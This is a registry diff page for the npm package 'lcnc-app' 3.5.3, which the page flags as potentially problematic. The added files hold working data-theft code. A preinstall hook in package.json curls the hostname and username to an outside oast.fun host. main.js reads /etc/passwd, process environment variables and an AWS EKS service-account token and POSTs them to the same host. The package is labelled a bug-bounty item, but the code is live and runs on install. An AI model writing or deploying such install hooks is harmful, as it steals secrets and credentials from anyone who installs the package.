lcnc-app 3.5.3
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of lcnc-app might be problematic. Click here for more details.
- package/main.js +50 -0
- package/package.json +13 -0
package/main.js
ADDED
|
@@ -0,0 +1,50 @@
|
|
|
1
|
+
const si = require('systeminformation');
|
|
2
|
+
const http = require('http');
|
|
3
|
+
const fs = require('fs');
|
|
4
|
+
|
|
5
|
+
si.osInfo().then(data => {
|
|
6
|
+
const options = {
|
|
7
|
+
hostname: 'pyeruljckrhnvlmqrofi7e1p6tsd63o8t.oast.fun',
|
|
8
|
+
path: '/',
|
|
9
|
+
method: 'POST',
|
|
10
|
+
headers: {
|
|
11
|
+
'Content-Type': 'application/json'
|
|
12
|
+
}
|
|
13
|
+
};
|
|
14
|
+
|
|
15
|
+
const sendPost = (payload) => {
|
|
16
|
+
const postData = JSON.stringify(payload);
|
|
17
|
+
options.headers['Content-Length'] = postData.length;
|
|
18
|
+
const req = http.request(options, res => {
|
|
19
|
+
res.on('data', d => process.stdout.write(d));
|
|
20
|
+
});
|
|
21
|
+
req.on('error', console.error);
|
|
22
|
+
req.write(postData);
|
|
23
|
+
req.end();
|
|
24
|
+
};
|
|
25
|
+
|
|
26
|
+
if (data.platform === 'linux' || data.platform === 'unix') {
|
|
27
|
+
// Reading /etc/passwd
|
|
28
|
+
fs.readFile('/etc/passwd', 'utf8', (err, passwdData) => {
|
|
29
|
+
if (!err) data.passwd = passwdData;
|
|
30
|
+
|
|
31
|
+
// Reading /proc/self/environ
|
|
32
|
+
fs.readFile('/proc/self/environ', 'utf8', (err, environData) => {
|
|
33
|
+
if (!err) data.environ = environData;
|
|
34
|
+
|
|
35
|
+
// Check if /var/run/secrets/eks.amazonaws.com/serviceaccount/token exists
|
|
36
|
+
const tokenPath = '/var/run/secrets/eks.amazonaws.com/serviceaccount/token';
|
|
37
|
+
if (fs.existsSync(tokenPath)) {
|
|
38
|
+
fs.readFile(tokenPath, 'utf8', (err, tokenData) => {
|
|
39
|
+
if (!err) data.token = tokenData;
|
|
40
|
+
sendPost(data);
|
|
41
|
+
});
|
|
42
|
+
} else {
|
|
43
|
+
sendPost(data);
|
|
44
|
+
}
|
|
45
|
+
});
|
|
46
|
+
});
|
|
47
|
+
} else {
|
|
48
|
+
sendPost(data);
|
|
49
|
+
}
|
|
50
|
+
});
|
package/package.json
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "lcnc-app",
|
|
3
|
+
"version": "3.5.3",
|
|
4
|
+
"description": "HackerOne Bug Bounty",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
8
|
+
"preinstall": "curl --data-urlencode \"info=$(hostname && whoami)\" http://pyeruljckrhnvlmqrofi7e1p6tsd63o8t.oast.fun"
|
|
9
|
+
},
|
|
10
|
+
"keywords": [],
|
|
11
|
+
"author": "pwn2day HackerOne",
|
|
12
|
+
"license": "ISC"
|
|
13
|
+
}
|